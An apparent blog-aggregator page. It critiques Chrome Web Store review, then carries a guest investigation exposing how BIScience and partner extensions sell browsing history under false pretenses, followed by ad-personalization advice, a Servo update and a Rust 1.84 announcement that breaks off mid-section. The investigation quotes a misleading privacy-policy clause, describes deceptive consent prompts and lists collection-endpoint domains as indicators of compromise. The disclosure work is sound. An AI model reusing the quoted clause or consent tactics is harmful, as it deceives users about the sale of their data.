Google Chrome first introduced browser extensions in 2011. At that point the dominant browser extensions ecosystem was Mozilla’s, having been around for 12 years already. Mozilla’s extensions suffered from a number of issues that Chrome developers noticed of course: essentially unrestricted privileges necessitated very thorough reviews before extensions could be published on Mozilla Add-ons website, due to high damage potential of the extensions (both intentional and unintentional). And since these reviews relied largely on volunteers, they often took a long time, with the publication delays being very frustrating to add-on developers.

Disclaimer: I was a reviewer on Mozilla Add-ons myself between 2015 and 2017.

Google Chrome was meant to address all these issues. It pioneered sandboxed extensions which allowed limiting extension privileges. And Chrome Web Store focused on automated reviews from the very start, relying on heuristics to detect problematic behavior in extensions, so that manual reviews would only be necessary occasionally and after the extension was already published. Eventually, market pressure forced Mozilla to adopt largely the same approaches.

Google’s over-reliance on automated tools caused issues from the very start, and it certainly didn’t get any better with the increased popularity of the browser. Mozilla accumulated a set of rules to make manual reviews possible, e.g. all code should be contained in the extension, so no downloading of extension code from web servers. Also, reviewers had to be provided with an unobfuscated and unminified version of the source code. Google didn’t consider any of this necessary for their automated review systems. So when automated review failed, manual review was often very hard or even impossible.

It’s only with the introduction of Manifest V3 now that Chrome finally prohibits remote hosted code. And it took until 2018 to prohibit code obfuscation, while Google’s reviewers still have to reverse minification for manual reviews. Mind you, we are talking about policies that were already long established at Mozilla when Google entered the market in 2011.

And extension sandboxing, while without doubt useful, didn’t really solve the issue of malicious extensions. I already wrote about one issue back in 2016:

The problem is: useful extensions will usually request this kind of “give me the keys to the kingdom” permission.

Essentially, this renders permission prompts useless. Users cannot possibly tell whether an extension has valid reasons to request extensive privileges. So legitimate extensions have to constantly deal with users who are confused about why the extension needs to “read and change all your data on all websites.” At the same time, users are trained to accept such prompts without thinking twice.

And then malicious add-ons come along, requesting extensive privileges under a pretense. Monetization companies put out guides for extension developers on how they can request more privileges for their extensions while fending off complains from users and Google alike. There is a lot of this going on in Chrome Web Store, and Manifest V3 couldn’t change anything about it.

So what we have now is:

  1. Automated review tools that malicious actors willing to invest some effort can work around.
  2. Lots of extensions with the potential for doing considerable damage, yet little way of telling which ones have good reasons for that and which ones abuse their privileges.
  3. Manual reviews being very expensive due to historical decisions.
  4. Massively inflated extension count due to unchecked spam.

Number 3 and 4 in particular seem to further trap Google in the “it needs to be automated” mindset. Yet adding more automated layers isn’t going to solve the issue when there are companies which can put a hundred employees on devising new tricks to avoid triggering detection. Yes, malicious extensions are big business.

What could Google do?

If Google were interested in making Chrome Web Store a safer place, I don’t think there is a way around investing considerable (manual) effort into cleaning up the place. Taking down a single extension won’t really hurt the malicious actors, they have hundreds of other extensions in the pipeline. Tracing the relationships between extensions on the other hand and taking down the entire cluster – that would change things.

As the saying goes, the best time to do this was a decade ago. The second best time is right now, when Chrome Web Store with its somewhat less than 150,000 extensions is certainly large but not yet large enough to make manual investigations impossible. Besides, there is probably little point in investigating abandoned extensions (latest release more than two years ago) which make up almost 60% of Chrome Web Store.

But so far Google’s actions have been entirely reactive, typically limited to extensions which already caused considerable damage. I don’t know whether they actually want to stay on top of this. From the business point of view there is probably little reason for that. After all, Google Chrome no longer has to compete for market share, having essentially won against the competition. Even with Chrome extensions not being usable, Chrome will likely stay the dominant browser.

In fact, Google has significant incentives to keep a particular class of extensions low, so one might even suspect intention behind allowing Chrome Web Store to be flooded with shady and outright malicious ad blockers.

Wladimir PalantBIScience: Collecting browsing history under false pretenses

  • This is a guest post by a researcher who wants to remain anonymous. You can contact the author via email.

Recently, John Tuckner of Secure Annex and Wladimir Palant published great research about how BIScience and its various brands collect user data. This inspired us to publish part of our ongoing research to help the extension ecosystem be safer from bad actors.

This post details what BIScience does with the collected data and how their public disclosures are inconsistent with actual practices, based on evidence compiled over several years.

Screenshot of a website citing a bunch of numbers: 10 Million+ opt-in panelists globally and growing, 60 Global Markets, 4.5 Petabyte behavioral data collected monthly, 13 Months average retention time of panelists, 250 Million online user events per day, 2 Million eCommerce product searches per day, 10 Million keyword searches recorded daily, 400 Million unique domains tracked daily<figcaption> Screenshot of claims on the BIScience website </figcaption>

Who is BIScience?

BIScience is a long-established data broker that owns multiple extensions in the Chrome Web Store (CWS) that collect clickstream data under false pretenses. They also provide a software development kit (SDK) to partner third-party extension developers to collect and sell clickstream data from users, again under false pretenses. This SDK will send data to sclpfybn.com and other endpoints controlled by BIScience.

“Clickstream data” is an analytics industry term for “browsing history”. It consists of every URL users visit as they browse the web.

According to their website, BIScience “provides the deepest digital & behavioral data intelligence to market research companies, brands, publishers & investment firms”. They sell clickstream data through their Clickstream OS product and sell derived data under other product names.

BIScience owns AdClarity. They provide “advertising intelligence” for companies to monitor competitors. In other words, they have a large database of ads observed across the web. They use data collected from services operated by BIScience and third parties they partner with.

BIScience also owns Urban Cyber Security. They provide VPN, ad blocking, and safe browsing services under various names: Urban VPN, 1ClickVPN, Urban Browser Guard, Urban Safe Browsing, and Urban Ad Blocker. Urban collects user browsing history from these services, which is then sold by BIScience to third parties through Clickstream OS, AdClarity, and other products.

BIScience also owned GeoSurf, a residential proxy service that shut down in December 2023.

BIScience collects data from millions of users

BIScience is a huge player in the browser extension ecosystem, based on their own claims and our observed activity. They also collect data from other sources, including Windows apps and Android apps that spy on other running apps.

The websites of BIScience and AdClarity make the following claims:

  • They collect data from 25 million users, over 250 million user events per day, 400 million unique domains
  • They process 4.5 petabytes of data every month
  • They are the “largest human panel based ad intelligence platform”

These numbers are the most recent figures from all pages on their websites, not only the home pages. They have consistently risen over the years based on archived website data, so it’s safe to say any lower figures on their website are outdated.

BIScience buys data from partner third-party extensions

BIScience proactively contacts extension developers to buy clickstream data. They claim to buy this data in anonymized form, and in a manner compliant with Chrome Web Store policies. Both claims are demonstrably false.

Several third-party extensions integrate with BIScience’s SDK. Some are listed in the Secure Annex blog post, and we have identified more in the IOCs section. There are additional extensions which use their own custom endpoint on their own domain, making it more difficult to identify their sale of user data to BIScience and potentially other data brokers. Secure Annex identifies October 2023 as the earliest known date of BIScience integrations. Our evidence points to 2019 or earlier.

Our internal data shows the Visual Effects for Google Meet extension and other extensions collecting data since at least mid-2022. BIScience has likely been collecting data from extensions since 2019 or earlier, based on public GitHub posts by BIScience representatives (2021, 2021, 2022) and the 2019 DataSpii research that found some references to AdClarity in extensions. BIScience was founded in 2009 when they launched GeoSurf. They later launched AdClarity in 2012.

BIScience receives raw data, not anonymized data

Despite BIScience’s claims that they only acquire anonymized data, their own extensions send raw URLs, and third-party extensions also send raw URLs to BIScience. Therefore BIScience collects granular clickstream data, not anonymized data.

If they meant to say that they only use/resell anonymized data, that’s not comforting either. BIScience receives the raw data and may store, use, or resell it as they choose. They may be compelled by governments to provide the raw data, or other bad actors may compromise their systems and access the raw data. In general, collecting more data than needed increases risks for user privacy.

Even if they anonymize data as soon as they receive it, anonymous clickstream data can contain sensitive or identifying information. A notable example is the Avast-Jumpshot case discovered by Wladimir Palant, who also wrote a deep dive into why anonymizing browsing history is very hard.

As the U.S. FTC investigation found, Jumpshot stored unique device IDs that did not change over time. This allowed reidentification with a sufficient number of URLs containing identifying information or when combined with other commercially-available data sources.

Similarly, BIScience’s collected browsing history is also tied to a unique device ID that does not change over time. A user’s browsing history may be tied to their unique ID for years, making it easier for BIScience or their buyers to perform reidentification.

BIScience’s privacy policy states granular browsing history information is sometimes sold with unique identifiers (emphasis ours):

In most cases the Insights are shared and [sold] in an aggregated non-identifying manner, however, in certain cases we will sell or share the insights with a general unique identifier, this identifier does not include your name or contact information, it is a random serial number associated with an End Users’ browsing activity. However, in certain jurisdictions this is considered Personal Data, and thus, we treat it as such.

Misleading CWS policies compliance

When you read the Chrome Web Store privacy disclosures on every extension listing, they say:

This developer declares that your data is

  • Not being sold to third parties, outside of approved use cases
  • Not being used or transferred for purposes that are unrelated to the item’s core functionality
  • Not being used or transferred to determine creditworthiness or for lending purposes

You might wonder:

  1. How is BIScience allowed to sell user data from their own extensions to third parties, through AdClarity and other BIScience products?
  2. How are partner extensions allowed to sell user data to BIScience, a third party?

BIScience and partners take advantage of loopholes in the Chrome Web Store policies, mainly exceptions listed in the Limited Use policy which are the “approved use cases”. These exceptions appear to allow the transfer of user data to third parties for any of the following purposes:

  • if necessary to providing or improving your single purpose;
  • to comply with applicable laws;
  • to protect against malware, spam, phishing, or other fraud or abuse; or,
  • as part of a merger, acquisition or sale of assets of the developer after obtaining explicit prior consent from the user

The Limited Use policy later states:

All other transfers, uses, or sale of user data is completely prohibited, including:

  • Transferring, using, or selling data for personalized advertisements.
  • Transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers.
  • Transferring, using, or selling user data to determine credit-worthiness or for lending purposes.

BIScience and partner extensions develop user-facing features that allegedly require access to browsing history, to claim the “necessary to providing or improving your single purpose” exception. They also often implement safe browsing or ad blocking features, to claim the “protect against malware, spam, phishing” exception.

Chrome Web Store appears to interpret their policies as allowing the transfer of user data, if extensions claim Limited Use exceptions through their privacy policy or other user disclosures. Unfortunately, bad actors falsely claim these exceptions to sell user data to third parties.

This is despite the CWS User Data FAQ stating (emphasis ours):

  1. Can my extension collect web browsing activity not necessary for a user-facing feature, such as collecting behavioral ad-targeting data or other monetization purposes?
    No. The Limited Uses of User Data section states that an extension can only collect and transmit web browsing activity to the extent required for a user-facing feature that is prominently described in the Chrome Web Store page and user interface. Ad targeting or other monetization of this data isn’t for a user-facing feature. And, even if a user-facing feature required collection of this data, its use for ad targeting or any other monetization of the data wouldn’t be permitted because the Product is only permitted to use the data for the user-facing feature.

In other words, even if there is a “legitimate” feature that collects browsing history, the same data cannot be sold for profit.

Unfortunately, when we and other researchers ask Google to enforce these policies, they appear to lean towards giving bad actors the benefit of the doubt and allow the sale of user data obtained under false pretenses.

We have the receipts contracts, emails, and more to prove BIScience and partners transfer and sell user data in a “completely prohibited” manner, primarily for the purpose of “transferring or selling user data to third parties like advertising platforms, data brokers, or other information resellers” with intent to monetize the data.

BIScience extensions exception claims

Urban products (owned by BIScience) appear to provide ad blocking and safe browsing services, both of which may claim the “protect against malware, spam, phishing” exception. Their VPN products (Urban VPN, 1ClickVPN) may claim the “necessary to providing single purpose” exception.

These exceptions are abused by BIScience to collect browsing history data for prohibited purposes, because they also sell this user data to third parties through AdClarity and other BIScience products. There are ways to provide these services without processing raw URLs in servers, therefore they do not need to collect this data. They certainly don’t need to sell it to third parties.

Reputable ad blocking extensions, such as Adblock Plus, perform blocking solely on the client side, without sending every URL to a server. Safe browsing protection can also be performed client side or in a more privacy-preserving manner even when using server-side processing.

Partner extensions exception claims, guided by BIScience

Partner third-party extensions collect data under even worse false pretenses. Partners are encouraged by BIScience to implement bogus services that exist solely to collect and sell browsing history to BIScience. These bogus features are only added to claim the Limited Use policy exceptions.

We analyzed several third-party extensions that partner with BIScience. None have legitimate business or technical reasons to collect browsing history and sell it to BIScience.

BIScience provides partner extensions with two integration options: They can add the BIScience SDK to automatically collect data, or partners can send their self-collected data to a BIScience API endpoint or S3 bucket.

The consistent message from the documents and emails provided by BIScience to our sources is essentially this, in our own words: You can integrate our SDK or send us browsing history activity if you make a plausible feature for your existing extension that has nothing to do with your actual functionality that you have provided for years. And here are some lies you can tell CWS to justify the collection.

BIScience SDK

The SDKs we have observed provide either safe browsing or ad blocking features, which makes it easy for partner extensions to claim the “protect against malware, spam, phishing” exception.

The SDK checks raw URLs against a BIScience service hosted on sclpfybn.com. With light integration work, an extension can allege they offer safe browsing protection or ad blocking. We have not evaluated how effective this safe browsing protection is compared to reputable vendors, but we suspect it performs minimal functionality to pass casual examination. We confirmed this endpoint also collects user data to resell it, which is unrelated to the safe browsing protection.

Unnecessary features

Whether implemented through the SDK or their own custom integration, the new “features” in partner extensions were completely unrelated to the extension’s existing core functionality. All the analyzed extensions had working core functionality before they added the BIScience integrations.

Let’s look at this illuminating graphic, sent by BIScience to one of our sources:

A block diagram titled “This feature, whatever it may be, should justify to Google Play or Google Chrome, why you are looking for access into users url visits information.” The scheme starts with a circle labeled “Get access to user’s browsing activity.” An arrow points towards a rectangle labeled “Send all URLs, visited by user, to your backend.” An arrow points to a rhombus labeled “Does the particular URL meets some criteria?” An asterisk in the rhombus points towards a text passage: “The criteria could fall under any of your preferences: -did you list the URL as malware? -is the URL a shopping website? -does the URL contain sensitive data? -is the URL travel related? etc.” An arrow labeled “No” points to a rectangle labeled “Do nothing; just store the URL and meta data.” An arrow labeled “Yes” points to a rectangle labeled “Store URL and meta data; provide related user functionality.” Both the original question and yes/no paths are contained within a larger box labeled “User functionality” but then have arrows pointing to another rectangle outside that box labeled “Send the data to Biscience endpoint.”

Notice how the graphic shows raw URLs are sent to BIScience regardless of whether the URL is needed to provide the user functionality, such as safe browsing protection. The step of sending data to BIScience is explicitly outside and separate from the user functionality.

Misleading privacy policy disclosures

BIScience’s integration guide suggests changes to an extension’s privacy policy in an attempt to comply with laws and Chrome Web Store policies, such as:

Company does not sell or rent your personal data to any third parties. We do, however, need to share your personal data to run our everyday business. We share your personal data with our affiliates and third-party service providers for everyday business purposes, including to:

  • Detect and suggest to close malware websites;
  • Analytics and Traffic Intelligence

This and other suggested clauses contradict each other or are misleading to users.

Quick fact check:

  • Extension doesn’t sell your personal data: False, the main purpose of the integration with BIScience is to sell browsing history data.
  • Extension needs to share your personal data: False, this is not necessary for everyday business. Much less for veiled reasons such as malware protection or analytics.

An astute reader may also notice BIScience considers browsing history data as personal data, given these clauses are meant to disclose transfer of browsing history to BIScience.

Misleading user consent

BIScience’s contracts with partners require opt-in consent for browsing history collection, but in practice these consents are misleading at best. Each partner must write their own consent prompt, which is not provided by BIScience in the SDK or documentation.

As an example, the extension Visual Effects for Google Meet integrated the BIScience safe browsing SDK to develop a new “feature” that collects browsing history:

Screenshot of a pop-up titled “Visual Effects is now offering Safe-Meeting.” The text says: “To allow us to enable integrated anti-mining and malicious site protection for the pages you visit please click agree to allow us access to your visited websites. Any and all data collected will be strictly anonymous.” Below it a prominent button with the label “Agree” and a much smaller link labeled “Disagree.”

We identified other instances of consent prompts that are even more misleading, such as a vague “To continue using our extension, please allow web history access” within the main product interface. This was only used to obtain consent for the BIScience integration and had no other purpose.

Our hope for the future

When you read the Chrome Web Store privacy disclosures on every extension listing, you might be inclined to believe the extension isn’t selling your browsing history to a third party. Unfortunately, Chrome Web Store allows this if extensions pretend they are collecting “anonymized” browsing history for “legitimate” purposes.

Our hope is that Chrome Web Store closes these loopholes and enforces stricter parts of the existing Limited Use and Single Purpose policies. This would align with the Chrome Web Store principles of Be Safe, Be Honest, and Be Useful.

If they don’t close these loopholes, we want CWS to clarify existing privacy disclosures shown to all users in extension listings. These disclosures are currently insufficient to communicate that user data is being sold under these exceptions.

Browser extension users deserve better privacy and transparency.

Related reading

If you want to learn more about browser extensions collecting your browsing history for profit:

IOCs

The Secure Annex blog post publicly disclosed many domains related to BIScience. We have observed additional domains over the years, and have included all the domains below.

We have chosen not to disclose some domains used in custom integrations to protect our sources and ongoing research.

Collection endpoints seen in third-party extensions:

  • sclpfybn[.]com
  • tnagofsg[.]com

Collection endpoints seen in BIScience-owned extensions and software:

  • urban-vpn[.]com
  • ducunt[.]com
  • adclarity[.]com

Third-party extensions which have disclosed in their privacy policies that they share raw browsing history with BIScience (credit to Wladimir Palant for identifying these):

  • sandvpn[.]com
  • getsugar[.]io

Collection endpoints seen in online data, software unknown but likely in third-party software:

  • cykmyk[.]com
  • fenctv[.]com

Collection endpoint in third-party software, identified in 2019 DataSpii research:

  • pnldsk[.]adclarity[.]com

Don MartiClick this to buy better stuff and be happier

Here’s my contender for Internet tip of the year. It’s going to take under a minute, and will not just help you buy better stuff, but also make you happier in general. Ready? Here it is, step by step.

  1. Log in to your Google account if you’re not logged in already. (If you have a Gmail or Google Drive tab open in the browser, you’re logged in.)

  2. Go to My Ad Center.

  3. Find the Personalized ads control. It looks something like this.

Personalized ads on <figcaption>Personalized ads on</figcaption>
  1. Turn it off.
Personalized ads off <figcaption>Personalized ads off</figcaption>
  1. That’s it. Unless you have another Google account. If you do have multiple Google acccounts (like home, school, and work accounts) do this for each one.

This will affect the ads you get on all the Google sites and apps, including Google Search and YouTube, along with the Google ads on other sites. Google is probably going to show you some message to try to discourage you from doing this. From what I can tell from the outside, it looks like turning off personalized ads will cost Google money. Last time I checked, I got the following message.

Ads may seem less relevant When your info isn’t used for ads, you may see fewer ads for products and brands that interest you. Non-personalized ads on Google are shown to you according to factors like the time of day, device type, your current search or the website you’re visiting, or your current location (based on your IP address or device permissions).

But what they don’t say is anything about how personalized ads will help you buy better products and services. And that’s because—and I’m going out on a limb here data-wise, but a pretty short and solid limb, and I’ll explain why—they just don’t. Choosing to turn off personalized ads somehow makes you a more satisfied shopper and better off.

How does this work?

I still don’t know how exactly how this tip works, but so far there have been a few theories.

1: lower fraud risk. It’s possible that de-personalizing the ads reduces the number of scam advertisers who can successfully reach you. Bian et al., in Consumer Surveillance and Financial Fraud, show that Apple App Tracking Transparency, which reduces the ability of apps to personalize ads, tended to reduce fraud complaints to the FTC.

We estimate that the reduction in tracking reduces money lost in all complaints by 4.7% and money lost reported in internet and data security complaints by 40.1%.

That’s a pretty big effect. De-personalizing ads might mean that your employer doesn’t get compromised by an ad campaign that delivers malware targeting a specific company, and you don’t get targeted for fake ads targeted to users of a software product. Even if the increase in fraud risk for users with personalization left on is relatively small, getting scammed has a big impact and can move the average money and happiness metrics a lot.

2: more mindful buying. Another possibility is that people who get fewer personalized ads are making fewer impulse purchases. Jessica Fierro and Corrine Reichert bought a selection of products from those Temu ads that seem to be everywhere, and decided they weren’t worth it. Maybe people without personalized ads are making fewer buying decisions but each one is better thought out.

3. buy more from higher quality vendors. Or maybe companies that put more money into personalized advertising tend to put less into improving product quality.ICMYI: Product is the P all marketers should strive to influence by Mark Ritson In Behavioral advertising and consumer welfare: An empirical investigation, Mustri et al. found that

targeted ads are more likely to be associated with lower quality vendors, and higher prices for identical products, compared to competing alternatives found in organic search results

In Why Your Brand Feels Like a Cheap Date: All Flash, No Substance in the World of Performance Marketing, Pesach Lattin writes,

Between 2019 and 2021, brands that focused on brand equity saw a 72% increase in value, compared to just 20% for brands that relied primarily on performance tactics. Ignoring brand-building not only weakens your baseline sales but forces you to spend more and more on performance marketing just to keep your head above water.

Brands that are over-focused on surveillance advertising might be forced to under-invest in product improvements.

4. limited algorithmic and personalized pricing. Personalized ads might be set up to offer the same product at higher prices to some people. The FTC was investigating, but from the research point of view, personalized pricing is really hard to tell apart from dynamic pricing. Even if you get volunteers to report prices, some might be getting a higher price because stock is running low, not because of who the individual is. So it’s hard to show how much impact this has, but hard to rule it out too.

5. it’s just a step on the journey. Another possibility is that de-personalizing the ads is a gateway to blocking ads entirely. What if, without personalization, the ads get gross or annoying enough that people tend to move up to an ad blocker? And, according to Lin et al. in The Welfare Effects of Ad Blocking,

[P]articipants that were asked to install an ad-blocker become less likely to regret recent purchases, while participants that were asked to uninstall their ad-blocker report lower levels of satisfaction with their recent purchases.

Maybe you don’t actually make better buying decisions while ads are on but personalization is off—but it’s a step toward full ad blocking where you do get better stuff and more happiness.

How do I know this works?

I’m confident that this tip works because if turning ad personalization off didn’t help you, Google would have said so a while ago. Remember the 52% paper about third-party cookies? Google made a big deal out of researching the ad revenue impact of turning cookie tracking on or off. And this ad personalization setting also has a revenue impact for Google. According to documents from one of Google’s Federal cases, keeping the number of users with ad personalization off low is a goal for Google—they make more money from you if you have personalization on, so they have a big incentive to try to convince you that personalization is a win-win. So why so quiet? The absence of a PDF about this is just as informative as the actual PDF would be.

And it’s not just Google. Research showing user benefits from personalized ads would be a fairly easy project not just for Google, but for any company that can both check a privacy setting and measure some kind of shopping outcome. Almost as long as Internet privacy tools have been a thing, so has advice from Internet Thought Leaders telling us they’re not a good idea. But for a data-driven industry, they’re bringing surprisingly little data—especially considering that for many companies it’s data they already have and would only need to do stats on, make graphs, and write (or have an LLM write) the abstract and body copy.

Almost any company with a mobile app could do research to show any benefits from ad personalization, too. Are the customers who use Apple iOS and turn off tracking more or less satisfied with their orders? Do banks get more fraud reports from app users with tracking turned on or off? It would be straightforward for a lot of companies to show that turning off personalization or turning on some privacy setting makes you a less happy customer—if it did.

The closest I have found so far is Balancing User Privacy and Personalization by Malika Korganbekova and Cole Zuber. This study simulated the effects of a privacy feature by truncating browsing history for some Wayfair shoppers, and found that people who were assigned to the personalized group and chose a product personalized to them were 10% less likely to return it than people in the non-personalized group. But that’s about a bunch of vendors of similar products that were all qualified by the same online shopping platform, not about the mix of honest and dishonest personalized ads that people get in total. So go back and do the tip if you didn’t already, enjoy your improved shopping experience, and be happy. More: effective privacy tips

Related

You can’t totally turn off ad personalization on Meta sites like Facebook, but there are settings to limit the flow of targeting data in or out. See Mad at Meta? Don’t Let Them Collect and Monetize Your Personal Data by Lena Cohen at the Electronic Frontier Foundation.

B L O C K in the U S A Ad blocking is trending up, and for the first time the people surveyed gave their number one reason as privacy, not annoyance or performance.

MimiOnuoha/missing-datasets: An overview and exploration of the concept of missing datasets. by Mimi Onuoha: That which we ignore reveals more than what we give our attention to. It’s in these things that we find cultural and colloquial hints of what is deemed important. Spots that we’ve left blank reveal our hidden social biases and indifferences.

The $16 hack to blocking ads on your devices for life (I don’t know about the product or the offer, just interesting to see it on a site with ads. Maybe the affiliate revenue is a much bigger deal than the programmatic ad revenue?)

personalization risks In practice, most of the privacy risks related to advertising are the result not of identifying individuals, but of treating different people in the same context differently.

Bonus links

Samuel Bendett and David Kirichenko cover Battlefield Drones and the Accelerating Autonomous Arms Race in Ukraine. Ukrainian officials started to describe their country as a war lab for the future—highlighting for allies and partners that, because these technologies will have a significant impact on warfare going forward, the ongoing combat in Ukraine offers the best environment for continuous testing, evaluation, and refinement of [autonomous] systems. Many companies across Europe and the United States have tested their drones and other systems in Ukraine. At this point in the conflict, these companies are striving to gain battle-tested in Ukraine credentials for their products.

Aram Zucker-Scharff writes, in The bounty hunter tendency, the future of privacy, and ad tech’s new profit frontier., The new generation of laws that are authorizing citizens to become bounty hunters are implicitly tied to the use of surveillance technology. They encourage the use of citizen vs citizen surveillance and create a dangerous environment that worsens the information imbalance between wealthy citizens and everyone else. (Is this a good argument against private right of action in privacy laws? It’s likely that troll lawyers will use existing wiretapping laws against legit news sites, which tend to have long and vulnerable lists of adtech partners.)

Scharon Harding covers TVs at CES 2025. On the one hand, TVs are adding far-field microphones which, um, yikes. But on the other hand, remember how the Microsoft Windows business and gaming market helped drive down the costs of Linux-capable workstation-class hardware? What is the big innovation that developers, designers, and architects will make out of big, inexpensive screens subsidized by the surveillance business?

The Servo BlogThis month in Servo: dark mode, keyword sizes, XPath, and more!

Servo now supports dark mode (@arthmis, @lazypassion, #34532), respecting the platform dark mode in servoshell and ‘prefers-color-scheme’ (@nicoburns, #34423, stylo#93) on Windows and macOS.

servoshell in dark mode, rendering the MDN article for ‘prefers-color-scheme’ in dark mode, when Windows is set to dark mode servoshell in light mode, rendering the MDN article for ‘prefers-color-scheme’ in light mode, when Windows is set to light mode
<figcaption>MDN article for ‘prefers-color-scheme’ in dark mode (left) and light mode (right), with --pref dom.resize_observer.enabled.</figcaption>

CSS transitions can now be triggered properly by script (@mrobinson, #34486), and we now support ‘min-height’ and ‘max-height’ on column flex containers (@Loirooriol, @mrobinson, #34450), ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ in block layout (@Loirooriol, #34641, #34568, #34695), ‘stretch’ on replaced positioned elements (@Loirooriol, #34430), as well as ‘align-self: self-start’, ‘self-end’, ‘left’, and ‘right’ on positioned elements (@taniishkaaa, @Loirooriol, #34365).

Servo can now run Discord well enough to log in and read messages, though you can’t send messages yet. To get this working, we landed some bare-bones AbortController support (@jdm, @syvb, #34519) and a WebSocket fix (@jdm, #34634). Try it yourself with --pref dom.svg.enabled --pref dom.intersection_observer.enabled --pref dom.abort_controller.enabled!

Discord login screen in Servo, showing form input and a QR code that never finishes loading Discord loading screen in Servo, after logging in
Discord channel screen in Servo, showing a few of Diffie’s messages and attachments

We now support console.trace() (@simonwuelker, #34629), PointerEvent (@wusyong, #34437), and the clonable property on ShadowRoot (@simonwuelker, #34514). Shadow DOM support continues to improve (@jdm, #34503), including very basic Shadow DOM layout (@mrobinson, #34701) when enabled via --pref dom.shadowdom.enabled.

script underwent (and continues to undergo) major rework towards being more reliable and faster to build. We’ve landed better synchronisation for DOM tree mutations (@jdm, #34505) and continued work on splitting up the script crate (@jdm, #34366). We’ve moved our ReadableStream support into Servo, eliminating the maintenance burden of a downstream SpiderMonkey patch (@gterzian, @wusyong, @Taym95, #34064, #34675).

The web platform guarantees that same-origin frames and their parents can synchronously observe resizes and their effects. Many tests rely on this, and not doing this correctly made Servo’s test results much flakier than they could otherwise be. We’ve made very good progress towards fixing this (@mrobinson, #34643, #34656, #34702, #34609), with correct resizing in all cases except when a same-origin frame is in another script thread, which is rare.

We now support enough of XPath to get htmx working (@vlindhol, #34463), when enabled via --pref dom.xpath.enabled.

htmx home page in Servo, with the hero banner thing now working (it relies on XPath)

Servo’s performance continues to improve, with layout caching for flex columns delivering up to 12x speedup (@Loirooriol, @mrobinson, #34461), many unnecessary reflows now eliminated (@mrobinson, #34558, #34599, #34576, #34645), reduced memory usage (@mrobinson, @Loirooriol, #34563, #34666), faster rendering for pages with animations (@mrobinson, #34489), and timers now operating without IPC (@mrobinson, #34581).

servoshell nightlies are up to 20% smaller (@atbrakhi, #34340), WebGPU is now optional at build time (@atbrakhi, #34444), and --features tracing no longer enables --features layout-2013 (@jschwe, #34515) for further binary size savings. You can also limit the size of several of Servo’s thread pools with --pref threadpools.fallback_worker_num and others (@jschwe, #34478), which is especially useful on machines with many CPU cores.

We’ve started laying the groundwork for full incremental layout in our new layout engine, starting with a general layout caching mechanism (@mrobinson, @Loirooriol, #34507, #34513, #34530, #34586). This was lost in the switch to our new layout engine, and without it, every time a page changes, we have to rerun layout from scratch. As you can imagine, this is very, very expensive, and incremental layout is critical for performance on today’s highly dynamic web.

Donations

Thanks again for your generous support! We are now receiving 4329 USD/month (+0.8% over November) in recurring donations. With this money, we’ve been able to cover our web hosting and self-hosted CI runners for Windows, Linux, and now macOS builds (@delan, #34868), halving mach try build times from over an hour to under 30 minutes! Next month, we’ll be expanding our CI capacity further, all made possible thanks to your help.

Servo is also on thanks.dev, and already sixteen GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

4329 USD/month
10000

As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

The Rust Programming Language BlogAnnouncing Rust 1.84.0

The Rust team is happy to announce a new version of Rust, 1.84.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.84.0 with:

$ rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.84.0.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.84.0 stable

Cargo considers Rust versions for dependency version selection

1.84.0 stabilizes the minimum supported Rust version (MSRV) aware resolver, which prefers dependency versions compatible with the project's declared MSRV. With MSRV-aware version selection, the toil is reduced for maintainers to support older toolchains by not needing to manually select older versions for each dependency.

You can opt-in to the MSRV-aware resolver via .cargo/config.toml:

[resolver]
incompatible-rust-versions = "fallback"

Then when adding a dependency:

$ cargo add clap
    Updating crates.io index
warning: ignoring clap@4.5.23 (which requires rustc 1.74) to maintain demo's rust-version of 1.60
      Adding clap v4.0.32 to dependencies
    Updating crates.io index
     Locking 33 packages to latest Rust 1.60 compatible versions
      Adding clap v4.0.32 (available: v4.5.23, requires Rust 1.74)

When verifying the latest dependencies in CI, you can override this:

$ CARGO_RESOLVER_INCOMPATIBLE_RUST_VERSIONS=allow cargo update
    Updating crates.io index
     Locking 12 packages to latest compatible versions
    Updating clap v4.0.32 -> v4.5.23

You can also opt-in by setting package.resolver = "3" in the Cargo.toml manifest file though that will require raising your MSRV to 1.84. The new resolver will be enabled by default for projects using the 2024 edition (which will stabilize in 1.85).

This gives library authors more flexibility when deciding their policy on adopting new Rust toolchain features. Previously, a library adopting features from a new Rust toolchain would force downstream users of that library who have an older Rust version to either upgrade their toolchain or manually select an old version of the library compatible with their toolchain (and avoid running cargo update). Now, those users will be able to automatically use older library versions compatible with their older toolchain.

See the documentation for more considerations when deciding on an MSRV policy.

Migration to the new trait solver begins

The Rust compiler is in the process of moving to a new implementation for the trait solver. The next-generation trait solver is a reimplementation of a core component of Rust's type system. It is not only responsible for checking whether trait-bounds - e.g. Vec<T>: Clone - hold, but is also used by many other parts of the type system, such as normalization - figuring out the underlying type of <Vec<T> as IntoIterator>::Item - and equating types (checking whether T and U are the same).

In 1.84, the new solver is used for checking coherence of trait impls. At a high level, coherence is responsible for ensuring that there is at most one implementation of a trait for a given type while considering not yet written or visible code from other crates.

This stabilization fixes a few mostly theoretical correctness issues of the old implementation, resulting in potential "conflicting implementations of trait ..." errors that were not previously reported. We expect the affected patterns to be very rare based on evaluation of available code through Crater. The stabilization also improves our ability to prove that impls do not overlap, allowing more code to be written in some cases.

For more details, see a previous blog post and the stabilization report.

Strict provenance APIs

In Rust, pointers are not simply an "integer" or "address". For instance, a "use after free" is undefined behavior even if you "get lucky" and the freed memory gets reallocated before your read/write. As another example, writing through a pointer derived from an &i32 reference is undefined behavior, even if writing to the same address via a different pointer is legal. The underlying pattern here is that the way a pointer is computed matters, not just the address that results from this computation. For this reason, we say that pointers have provenance: to fully characterize pointer-related undefined behavior in Rust, we have to know not only the address the pointer points to, but also track which other pointer(s) it is "derived from".

